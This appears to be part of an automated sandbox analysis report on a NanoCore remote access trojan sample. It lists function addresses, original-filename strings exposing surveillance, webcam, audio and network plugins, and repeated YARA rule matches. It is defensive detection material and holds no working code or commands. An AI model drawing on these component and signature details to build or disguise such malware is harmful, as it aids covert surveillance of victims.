Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_05379788	13_2_05379788
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0537A5E1	13_2_0537A5E1
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0537A610	13_2_0537A610
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0644F470	13_2_0644F470
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_06444530	13_2_06444530
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_06443918	13_2_06443918
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_064445EE	13_2_064445EE
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D2778	13_2_072D2778
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072DAB58	13_2_072DAB58
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072DA288	13_2_072DA288
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D09C8	13_2_072D09C8
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072DF001	13_2_072DF001
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D0040	13_2_072D0040
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D9F40	13_2_072D9F40
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D344E	13_2_072D344E
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D3390	13_2_072D3390
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D00FE	13_2_072D00FE

Source: ZVFVY7NwZ7.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: chromee.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZVFVY7NwZ7.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: ZVFVY7NwZ7.exe	Binary or memory string: OriginalFilename vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.333543437.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.345607179.0000000005DA0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.345607179.0000000005DA0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.346216857.00000000064B0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaww.exe$ vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.346154749.00000000060E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameQpadcaxe.dll" vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.333573296.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.345023411.0000000005A90000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 00000000.00000002.345418023.0000000005CA0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe	Binary or memory string: OriginalFilename vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.485533832.00000000074C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.483796386.0000000005F50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs ZVFVY7NwZ7.exe
Source: ZVFVY7NwZ7.exe	Binary or memory string: OriginalFilenameaww.exe$ vs ZVFVY7NwZ7.exe

Source: ZVFVY7NwZ7.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 2220, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 2220, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.6400000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6400000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.674e8a4.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.674e8a4.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6480000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6480000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6410000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6410000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.409e360.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.409e360.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
